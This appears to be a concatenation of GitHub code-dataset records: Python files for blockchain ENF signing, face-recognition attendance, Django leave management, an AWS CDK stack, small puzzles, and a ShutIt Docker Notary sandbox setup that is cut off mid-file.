def load_ENF(ENF_file):\n '''\n Load ENF data from ENF_file\n\n Args:\n ENF_name: ENF file name\n Returns:\n json_ENF: json format ENF data\n\n '''\n ls_lines=FileUtil.ReadLines(ENF_file)\n ls_record=[]\n for line in ls_lines:\n #print(line[:-1].split(';'))\n ls_record.append(line[:-1].split(';'))\n\n ls_ENF=[]\n for record in ls_record:\n ls_ENF.append( format(float(record[0]), '.2f') )\n\n # print(ls_ENF)\n json_ENF = {}\n json_ENF['id']=ENF_file\n json_ENF['ENF']=ls_ENF\n\n return json_ENF\n\n\n @staticmethod\n def verify_ENF(ENF_file):\n '''\n Verify ENF value by querying from blockchain\n\n Args:\n ENF_name: ENF file name\n Returns:\n Verified result: True or False\n '''\n # 1) Read token data using call\n ls_time_exec = []\n\n query_json = {}\n query_json['data']='\"' + ENF_file +'\"'\n start_time=time.time()\n\n query_ret=Tender_RPC.abci_query(query_json)\n\n # -------- parse value from response and display it ------------\n key_str=query_ret['result']['response']['key']\n value_str=query_ret['result']['response']['value']\n logger.info(\"Fetched ENF value:\")\n logger.info(\"id: {}\".format(TypesUtil.base64_to_ascii(key_str)) )\n if( value_str!= None):\n query_ENF_value = TypesUtil.base64_to_ascii(value_str)\n else:\n query_ENF_value = ''\n # convert tx to json format\n query_ENF_json = TypesUtil.tx_to_json(query_ENF_value)\n logger.info(\"value: {}\".format(query_ENF_json))\n\n # 2) verify signature\n string_ENF = str(query_ENF_json['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n sign_ENF = TypesUtil.hex_to_string(query_ENF_json['sign_ENF'])\n\n load_public_key_bytes = Crypto_DSA.load_key_bytes('public_key_file')\n reload_public_key = Crypto_DSA.load_public_key_bytes(load_public_key_bytes)\n verify_sign=Crypto_DSA.verify(reload_public_key,sign_ENF,byte_ENF)\n logger.info(\"Sign verification: {}\".format(verify_sign))\n \n exec_time=time.time()-start_time\n ls_time_exec.append( format( exec_time*1000, '.3f' ) ) \n\n # Prepare log messgae\n str_time_exec=\" \".join(ls_time_exec)\n FileUtil.save_testlog('test_results', 'exec_verify_ENF.log', str_time_exec)\n\n # 3) return verify hash model result\n return verify_sign\n\n @staticmethod\n def tx_evaluate(ENF_file):\n '''\n Launch tx and evaluate tx committed time\n\n Args:\n ENF_file: ENF file name\n Returns:\n tx committed reulst\n '''\n # 1) load ENF data from file\n json_ENF = TenderUtils.load_ENF(ENF_file)\n logger.info(json_ENF)\n\n # 2) sign ENF data in json_ENF['ENF']\n string_ENF = str(json_ENF['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n load_private_key_bytes = Crypto_DSA.load_key_bytes('private_key_file')\n reload_private_key = Crypto_DSA.load_private_key_bytes(load_private_key_bytes, \n encryp_pw=b'samuelxu999')\n sign_ENF = Crypto_DSA.sign(reload_private_key, byte_ENF)\n logger.info(sign_ENF)\n\n # 3) evaluate tx committed time\n start_time=time.time()\n logger.info(\"tx signed ENF: {} to blockchain...\\n\".format(ENF_file)) \n\n # -------- prepare parameter for tx ------------\n tx_json = {}\n key_str = ENF_file\n value_json = {}\n value_json['ENF']=json_ENF['ENF']\n value_json['sign_ENF']=TypesUtil.string_to_hex(sign_ENF)\n # convert json to tx format\n value_str = TypesUtil.json_to_tx(value_json)\n tx_data = key_str + \"=\" + value_str \n # --------- build parameter string: tx=? --------\n tx_json['tx']='\"' + tx_data +'\"' \n # print(tx_json)\n tx_ret=Tender_RPC.broadcast_tx_commit(tx_json)\n exec_time=time.time()-start_time\n logger.info(\"tx committed time: {:.3f}\\n\".format(exec_time, '.3f')) \n FileUtil.save_testlog('test_results', 'exec_tx_commit_ENF.log', format(exec_time, '.3f'))\n # print(tx_ret)\n return tx_ret\n\nclass ContractUtils(object):\n '''\n Get BC_account given node_name\n @node_name: ip_address:port_num\n @datafile: node account datafile path\n '''\n @staticmethod\n def getAddress(node_name, datafile):\n address_json = json.load(open(datafile))\n return address_json[node_name]\n\n '''\n Get IndexAuth_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getIndexToken(service_addr, index_id, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getIndexToken\"\n params={}\n params['index_id']=index_id\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get authorized nodes\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getAuthorizedNodes(service_addr, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getAuthorizedNodes\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify hashed index value\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def verify_indexToken(service_addr, index_id, index_data, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/verify_indexToken\"\n params={}\n params['index_id']=index_id\n params['index_data']=index_data\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get CapAC_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getCapToken(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/getCapToken\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify Access\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidAccess(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/isValidAccess\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get Vnode information\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getVNodeInfo(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/getVNodeInfo\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify identity\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidID(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/isValidID\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\nclass MonoClient(object):\n '''\n Get record by id\n '''\n @staticmethod\n def Get_DataByID(data_args={}):\n # construct params\n params={}\n params['project_id']=data_args['project_id']\n\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/test/api/v1.0/dt/project\" \n\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args['data']), headers=headers)\n \n #get response json\n json_response = response.json() \n\n return json_response","repo_name":"samuelxu999/Research","sub_path":"Security/py_dev/BlendSPS/src/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"30653422542","text":"from typing import List\nfrom typing import List\n\ndef sneak_string_v1(chars: str) -> List[List[str]]:\n result = [[], [], []]\n index = len(result) // 2\n up_flag = 1\n for char in chars:\n if index == 0:\n result[0].append(char)\n result[1].append(' ')\n result[2].append(' ')\n index = 1\n up_flag = 0\n elif index == 1: \n result[0].append(' ')\n result[1].append(char)\n result[2].append(' ')\n if up_flag:\n index -= 1\n else:\n index += 1\n elif index == 2:\n result[0].append(' ')\n result[1].append(' ')\n result[2].append(char)\n up_flag = 1\n index = 1\n \n return result\n\ndef sneak_string_v2(chars: str, size: int) -> List[List[str]]:\n result = [[] for _ in range(size)]\n result_index = {i for i in range(len(result))}\n insert_index = len(result) // 2\n up_flag = 1\n \n for char in chars:\n result[insert_index].append(char)\n for rest_index in result_index - {insert_index}:\n result[rest_index].append(' ')\n \n if insert_index == min(result_index):\n insert_index += 1\n up_flag = 0\n elif insert_index == max(result_index):\n insert_index -= 1\n up_flag = 1\n else:\n if up_flag:\n insert_index -= 1\n else:\n insert_index += 1\n \n return result\n \n\ndef print_sneak(result: List[List[str]]) -> None:\n for list in result:\n print(''.join(list))\n \n \n \nif __name__ == '__main__':\n chars1 = '012345678901234567890123456789'\n chars2 = 'abcdefghijklmnopqrstuzwxyz'\n # result = sneak_string_v1(chars1)\n # print_sneak(result)\n result = sneak_string_v2(chars2, 10)\n print_sneak(result)","repo_name":"Tsujiba/Python-Sample","sub_path":"algolism/07_quiz/sneak_output.py","file_name":"sneak_output.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7389605836","text":"import logging\n\nfrom aiohttp import web\nfrom ipaddress import ip_address\nfrom netifaces import interfaces, ifaddresses, AF_INET\nimport qrcode\n\nfrom manokee.web.app import app\n\n\ndef ipv4_addresses():\n result = []\n for interface in interfaces():\n links = ifaddresses(interface).get(AF_INET, [])\n for link in links:\n addr = ip_address(link[\"addr\"])\n if not addr.is_loopback:\n result.append(addr)\n return result\n\n\ndef main():\n port = 5000\n addresses = ipv4_addresses()\n assert len(addresses) > 0\n print(\"OPEN MANOKEE IN A BROWSER AT:\")\n for address in addresses:\n url = f\"http://{address}:{port}/\"\n print(url)\n qr = qrcode.QRCode()\n qr.add_data(url)\n qr.print_ascii()\n web.run_app(app, port=port, access_log=logging.getLogger(\"webserver\"))\n","repo_name":"smiszym/manokee","sub_path":"manokee/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"21083386926","text":"import requests\nimport time\nimport re\n\nurl = 'http://comet.blog.sina.com.cn/api?maintype=hits&act=4&aid=5c47219b01011oox&ref=http%3A%2F%2Fblog.sina.com.cn%2Fu%2F1548165531&varname=requestId_63901005'\nheaders = {\n 'Referer': 'http://blog.sina.com.cn/u/5874775575'\n}\n\nwhile True:\n wb_date = requests.get(url, headers=headers)\n a = wb_date.text.split('=')[-1]\n a = int(re.findall('\\d{1,10}', a)[0])\n time.sleep(10)\n wb_date = requests.get(url, headers=headers)\n b = wb_date.text.split('=')[-1]\n b = int(re.findall('\\d{1,10}', b)[0])\n print((b - a) * 6 * 60)\n","repo_name":"meta-tabchen/Python-In-Action","sub_path":"新浪博客/count001.py","file_name":"count001.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15454556617","text":"from sqlite3 import connect\nfrom imutils import face_utils\nimport dlib\nimport cv2\nfrom face_recognition import load_image_file, face_encodings, compare_faces\nfrom tkinter import *\nimport os\nimport cv2\nfrom tkinter import filedialog\nfrom PIL import ImageTk,Image\nimport tkinter\nimport numpy as np\nfrom scipy import spatial\ndef read_data_from_db():\n\tdb_loc = r'C:\\Users\\ELCOT\\Documents\\Chandru\\Git_Bash\\Attendance_system_using_facial_recognition\\CODE\\final\\db\\STUDENTSDATA.db'\n\t#print ('studentsdata Database opened')\n\tconn = connect(db_loc)\n\tcurser = conn.cursor()\n\tcommand = '''SELECT * FROM students_record '''\n\tdata = curser.execute(command)\n\tres_list = []\n\ttemp_lis = []\n\ttemp_encoding = []\n\tfor record in data:\n\t\ttemp_lis = list(record[0:2])\n\t\ttemp_encoding = record[2:]\n\t\ttemp_lis.append(np.asarray(temp_encoding))\n\t\tres_list.append(tuple(temp_lis))\n\tconn.close()\n\tres = tuple(res_list)\n\treturn (res)\n\ndef find_faces_in_img(img_loc):\n\t# initialize dlib's face detector (HOG-based) and then create\n\t# the facial landmark predictor\n\tdetector = dlib.get_frontal_face_detector()\n\t# load the input image and convert it to grayscale\n\timage = cv2.imread(img_loc)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#frame = imutils.resize(frame, width=450)\n\t# detect faces in the grayscale image\n\trects = detector(gray, 0)\n\tencoding_in_class_lis = []\n\t# loop over the face detections\n\tfor (i, rect) in enumerate(rects):\n\t\t# determine the facial landmarks for the face region, then\n\t\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t\t# array\n\t\t# Start coordinate, here (5, 5) \n\t\t# represents the top left corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.left())\n\t\tlis.append(rect.top())\n\t\tstart_point = tuple(map(int, lis))\n\t\t# Ending coordinate, here (220, 220) \n\t\t# represents the bottom right corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.right())\n\t\tlis.append(rect.bottom())\n\t\tend_point = tuple(map(int, lis))\n\t\t# # Blue color in BGR \n\t\t# color = (255, 0, 0) \n\t\t# # Line thickness of 2 px \n\t\t# thickness = 2\n\t\tcrop_img = image[start_point[1]:end_point[1], start_point[0]:end_point[0]]\n\t\tcv2.imwrite(r'C:\\Users\\ELCOT\\Documents\\Cls{}.jpg'.format(i), crop_img)\n\t\tencoding = face_encodings(crop_img)[0]\n\t\tencoding_in_class_lis.append(encoding)\n\tencoding_in_class = tuple(encoding_in_class_lis)\n\treturn (encoding_in_class)\n\ndef compare_2_faces(known_encoding, unknown_encoding):\n\t# known encoding will be register images that is already in the db\n\t# unknown encoding will be the image taken \n\t# result = 1 - spatial.distance.cosine(known_encoding, unknown_encoding)\n\t# print(result)\n\t# return (result)\n\tres = compare_faces([known_encoding], unknown_encoding, tolerance=0.5)[0]\n\t#print(res)\n\treturn (res)\n\ndef compare_in_db(encoding_in_class, encoding_in_db):\n\tfor i in encoding_in_class:\n\t\tfor j in encoding_in_db:\n\t\t\tif (compare_2_faces(j[2], i)):\n\t\t\t\tprint(j[0])\n\t\t\t\tprint(j[1])\n\t\t\t\tbreak\n\ndef browse():\n global filename\n \n \n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"all files\",\n \"*.*\"),\n (\"Text files\",\n \"*.txt*\")))\n\n \n\n label_file_explorer = Label(\n text = \"File Explorer using Tkinter\",\n width = 100, height = 4,\n fg = \"blue\")\n\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n Label(screen,text = filename).place(x=150,y=100)\n\n button_exit = Button(\n text = \"Exit\",\n command = exit)\n\ndef send_data():\n\timg_loc = filename\n\tencoding_in_class = find_faces_in_img(img_loc)\n\tencoding_in_db = read_data_from_db()\n\tcompare_in_db(encoding_in_class, encoding_in_db)\n\ndef main_screen():\n\tglobal screen\n\tscreen = Tk()\n\tscreen.geometry(\"400x350\")\n\tscreen.title(\"Register\")\n\tglobal userid\n\tglobal stdname\n\tglobal path\n\tglobal registerid\n\tglobal studentname\n\tglobal filepath\n\tuserid=StringVar()\n\tstdname=StringVar()\n\tpath=StringVar()\n\tLabel(screen,text=\"Browse Image to mark attendance \").place(x=100,y=50)\n\tLabel(screen,text=\"\").pack()\n\tLabel(screen,text = \"Choose Image:\").place(x=50,y=100)\n\tButton(screen,text = \"Browse\",width=\"15\", command = browse).place(x=150,y=150)\n\tButton(screen,text = \"submit\",width=\"15\", command = send_data).place(x=150,y=200)\n\tscreen.mainloop()\n\nif __name__ == \"__main__\":\n\tmain_screen()","repo_name":"KabilChakravarthy/Face_Recognition_Attendance_System","sub_path":"CODE/final/face_attend_2.py","file_name":"face_attend_2.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23994749870","text":"\nimport datetime\nfrom datetime import date\nfrom leave.models import Leave, LeaveSummary\nfrom mysite.share.views import getUsername, handleInput, urlResponse, verifyAndGenNewToken, sessionExpiredResponse, wrongParameterResponse\n\ndef leaveSummary(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0)\n return urlResponse({'data': [LeaveSummary.deserialize(ls) for ls in leaveSummary]}, 200, authorization)\n\ndef leaveComing(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__gte=date.today(), rejected_remark='', is_deleted=0).exclude(approved_by='').order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leavePending(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, approved_by='', rejected_remark='', is_deleted=0).order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveHistory(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__lt=date.today(), is_deleted=0).exclude(approved_by='').order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveApproval(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = handleInput(request, ['username'], 'GET')\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(approver=username, approved_by='', is_deleted=0).order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef applyLeave(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n leave_type, leave_from, fromTime, leave_to, toTime, approver, attachment, remark = handleInput(request, \n ['leave_type', 'from', 'fromTime', 'to', 'toTime', 'approver', 'attachment', 'remark'], 'POST')\n leaveFrom = leave_from.split('T')\n startDate = datetime.datetime(leaveFrom[0], leaveFrom[1], leaveFrom[2], 0, 0)\n leaveTo = leave_to.split('T')\n endDate = datetime.datetime(leaveTo[0], leaveTo[1], leaveTo[2], 0, 0)\n delta = datetime.timedelta(days=1)\n numberOfLeaveTaken = 0\n while (startDate <= endDate):\n newLeave = dict()\n newLeave['created_by'] = username\n newLeave['updated_by'] = username\n newLeave['username'] = username\n newLeave['leave_type'] = leave_type\n newLeave['leave_date'] = startDate\n newLeave['approver'] = approver\n newLeave['attachment'] = attachment\n newLeave['remark'] = remark\n if numberOfLeaveTaken == 0:\n if len(fromTime) > 0:\n newLeave['leave_date_time'] = fromTime\n numberOfLeaveTaken -= 0.5\n if startDate == endDate: \n if len(toTime) > 0:\n newLeave['leave_date_time'] = toTime\n numberOfLeaveTaken -= 0.5\n startDate += delta\n numberOfLeaveTaken += 1\n newLeaveRecord = Leave()\n newLeaveRecord.saveNew(newLeave)\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0, leave_type=leave_type).first()\n leaveSummary.leave_balance -= numberOfLeaveTaken\n leaveSummary.save()\n return urlResponse({'message': 'Data successfully addded!'}, 200, authorization)","repo_name":"Justaway97/back-end-template","sub_path":"mysite/leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33059350465","text":"from aws_cdk import (\n Environment,\n RemovalPolicy,\n Stage,\n Duration,\n Stack,\n pipelines as cdkpipe,\n aws_codepipeline as pipe,\n aws_sqs as sqs,\n aws_s3 as s3\n)\nfrom constructs import Construct\nimport random, string\n\n\ndef generate_random_string(length):\n characters = string.ascii_letters + string.digits\n random_string = ''.join(random.choice(characters) for _ in range(length))\n return random_string\n\nrandom_string = generate_random_string(10)\n\nclass ResourceEuropeStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n queue = sqs.Queue(\n self, \"MyEuropeanQueue\",\n visibility_timeout=Duration.seconds(300),\n )\n bucket = s3.Bucket(self, \"myEuropeanBucket\", \n bucket_name=f\"my-european-bucket-{random_string.lower()}\",\n versioned=True,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n auto_delete_objects=True,\n removal_policy=RemovalPolicy.DESTROY\n )\n \nclass DeployEuropeStage(Stage):\n def __init__(self, scope: Construct, construct_id: str, env: Environment, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n ResourceEuropeStack(self, 'ResourceStack', env=env, stack_name='test-stack-in-EUROPE')\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/europe_resources.py","file_name":"europe_resources.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1132098238","text":"# 내 풀이\n# 연산자 우선순위 재정의하여 만들 수 있는 가장 큰 숫자 제출(+,-,*), 절댓값\n# 연산자 들을 리스트에 담아서 중복걸러낸 다음에 우선순위 정함\n# 같은 연산자 끼리는 앞에 있는 것의 우선순위가 더 높다\n# 문자열 수식을 계산하는 eval()이용 \nimport math\nfrom itertools import permutations\ndef solution(ex):\n res = [] # 연산자를 기준으로 문자열을 잘라서 저장하는 리스트\n ans = [] # 우선순위에 따라 나올 수 있는 값들의 리스트\n k = [\"-\",\"+\",\"*\"]\n _k = [i for i in ex if i in k]\n l = [(i,j) for i,j in enumerate(ex) if j in k] # -,+,* 가 들어있는 인덱스와 값 저장 \n dup = list(set(_k))\n \n # 잘라서 넣기\n for i in range(len(l)):\n if i == 0:\n b = l[0][0]\n print(b)\n res.append(ex[:b])\n res.append(ex[b])\n else:\n a = b + 1 # start\n b = l[i][0] # end\n res.append(ex[a:b])\n res.append(ex[b])\n res.append(ex[b+1:])\n print(res)\n \n p = list(permutations(dup,len(dup))) # 우선순위 조합\n print(p)\n \n # 우선순위에 맞게 계산\n for i in range(len(p)): # 우선순위 조합 탐색\n arr = res[:]\n for j in range(len(dup)): # 연산자 우선순위(1,2,3) 탐색\n x = arr.count(p[i][j])\n for _ in range(x): # 같은 연산자 여러개면 그 개수만큼 반복\n r = arr.index(p[i][j])\n arr[r-1] = str(eval(arr[r-1]+arr[r]+arr[r+1])) # 연산자로 계산해서 그 값을 리스트에 다시 저장\n del arr[r] \n del arr[r]\n print(arr)\n ans.append(abs(int(arr[0])))\n # print(ans)\n # print(p) \n return int(max(ans))\n\n\n \n# 더 나은 풀이\n# 정규 표현식 이용\nimport re\nfrom itertools import permutations\n\ndef solution(expression):\n #1\n op = [x for x in ['*','+','-'] if x in expression]\n op = [list(y) for y in permutations(op)]\n ex = re.split(r'(\\D)',expression)\n\n #2\n a = []\n for x in op:\n _ex = ex[:]\n for y in x:\n while y in _ex:\n tmp = _ex.index(y)\n _ex[tmp-1] = str(eval(_ex[tmp-1]+_ex[tmp]+_ex[tmp+1])) # 나랑 똑같은 방식\n _ex = _ex[:tmp]+_ex[tmp+2:] # del로 제거하는 대신에 슬라이싱 이용 \n a.append(_ex[-1])\n\n #3\n return max(abs(int(x)) for x in a)","repo_name":"yeye921/algorithm-study","sub_path":"Level2/maximize_formula.py","file_name":"maximize_formula.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30317742726","text":"# Напишите программу, которая определит позицию второго вхождения строки в списке либо сообщит, что её нет.\n# *Пример:*\n# - список: [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"], ищем: \"qwe\", ответ: 3\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"], ищем: \"йцу\", ответ: 5\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\"], ищем: \"йцу\", ответ: -1\n# - список: [\"123\", \"234\", 123, \"567\"], ищем: \"123\", ответ: -1\n# - список: [], ищем: \"123\", ответ: -1\n\n# my_list = [\"123\", \"234\", 123, '567']\n# print(my_list)\n\n# string_find = \"123\"\n# count = 0\n# for i in range(len(my_list)):\n# if string_find == my_list[i]:\n# count += 1\n# if count == 2:\n# print(i)\n# else:\n# print(-1)\n\nmy_list = [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"]\nmy_str = input('Введите строку')\n\nif my_list.count(my_str) > 1:\n first_index = my_list.index(my_str)\n print(my_list.index(my_str, first_index + 1))\nelse:\n print(-1)\n\n# Улучшение кода:\n\nfrom typing import List \n\ndef find_second_entry(str_list: List[str], search_word: str):\n try:\n return [i for i, elem in enumerate(str_list) if elem == search_word][1]\n except IndexError:\n return -1","repo_name":"dvsni/Python","sub_path":"Task #6.5.py","file_name":"Task #6.5.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20310603720","text":"import random\nimport string\n\nfrom shutit_module import ShutItModule\n\nclass shutit_notary_trust_sandbox(ShutItModule):\n\n\n\tdef build(self, shutit):\n\t\tvagrant_image = shutit.cfg[self.module_id]['vagrant_image']\n\t\tvagrant_provider = shutit.cfg[self.module_id]['vagrant_provider']\n\t\tgui = shutit.cfg[self.module_id]['gui']\n\t\tmemory = shutit.cfg[self.module_id]['memory']\n\t\tmodule_name = 'shutit_notary_trust_sandbox_' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\n\t\tshutit.send('rm -rf /tmp/' + module_name + ' && mkdir -p /tmp/' + module_name + ' && cd /tmp/' + module_name)\n\t\tshutit.send('vagrant init ' + vagrant_image)\n\t\tshutit.send_file('/tmp/' + module_name + '/Vagrantfile','''\nVagrant.configure(2) do |config|\n config.vm.box = \"''' + vagrant_image + '''\"\n # config.vm.box_check_update = false\n # config.vm.network \"forwarded_port\", guest: 80, host: 8080\n # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n # config.vm.network \"public_network\"\n # config.vm.synced_folder \"../data\", \"/vagrant_data\"\n config.vm.provider \"virtualbox\" do |vb|\n vb.gui = ''' + gui + '''\n vb.memory = \"''' + memory + '''\"\n vb.name = \"shutit_notary_trust_sandbox\"\n end\nend''')\n\t\tshutit.send('vagrant up --provider virtualbox',timeout=99999)\n\t\tshutit.login(command='vagrant ssh')\n\t\tshutit.login(command='sudo su -',password='vagrant')\n\t\tshutit.install('apt-transport-https')\n\t\tshutit.install('ca-certificates') \n\t\tshutit.send('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n\t\tshutit.send('touch /etc/apt/sources.list.d/docker.list')\n\t\tshutit.send('''cat > /etc/apt/sources.list.d/docker.list << END\ndeb https://apt.dockerproject.org/repo ubuntu-trusty main\nEND''')\n\t\tshutit.send('apt update -y')\n\t\tshutit.send('apt-cache policy docker-engine')\n\t\tshutit.install('docker-engine')\n\t\tshutit.send('curl -L https://github.com/docker/compose/releases/download/1.8.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose')\n\t\tshutit.send('chmod +x /usr/local/bin/docker-compose')\n\t\tshutit.send('''cat > docker-compose.yml << END\nversion: \"2\"\nservices:\n notaryserver:\n image: dockersecurity/notary_autobuilds:server-v0.3.0\n volumes:\n - notarycerts:/go/src/github.com/docker/notary/fixtures\n networks:\n - sandbox\n environment:\n - NOTARY_SERVER_STORAGE_TYPE=memory\n - NOTARY_SERVER_TRUST_SERVICE_TYPE=local\n sandboxregistry:\n image: registry:2.4.1\n networks:\n - sandbox\n container_name: sandboxregistry\n trustsandbox:\n image: docker:dind\n networks:\n - sandbox\n volumes:\n - notarycerts:/notarycerts\n privileged: true\n container_name: trustsandbox\n entrypoint: \"\"\n command: |-\n sh -c '\n cp /notarycerts/root-ca.crt /usr/local/share/ca-certificates/root-ca.crt &&\n update-ca-certificates &&\n dockerd-entrypoint.sh --insecure-registry sandboxregistry:5000'\nvolumes:\n notarycerts:\n external: false\nnetworks:\n sandbox:\n external: false\nEND''')\n\t\tshutit.send('docker-compose up -d')\n\t\tshutit.login('docker exec -it trustsandbox sh')\n\t\tshutit.pause_point('')\n\t\tshutit.send('docker pull docker/trusttest')\n\t\tshutit.send('docker tag docker/trusttest sandboxregistry:5000/test/trusttest:latest')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST=1')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST_SERVER=https://notaryserver:4443')\n\t\tshutit.send('docker pull sandboxregistry:5000/test/trusttest')\n\t\tshutit.logout()\n\t\tshutit.send('docker logs trustsandbox')\n\t\tshutit.pause_point('')\n\n\n\t\tshutit.logout()\n\t\tshutit.logout()\n\t\treturn True\n\n\tdef get_config(self, shutit):\n\t\tshutit.get_config(self.module_id,'vagrant_image',default='ubuntu/trusty64')\n\t\tshutit.get_config(self.module_id,'vagrant_provider',default='virtualbox')\n\t\tshutit.get_config(self.module_id,'gui',default='false')\n\t\tshutit.get_config(self.module_id,'memory',default='1024')\n\n\t\treturn True\n\n\tdef 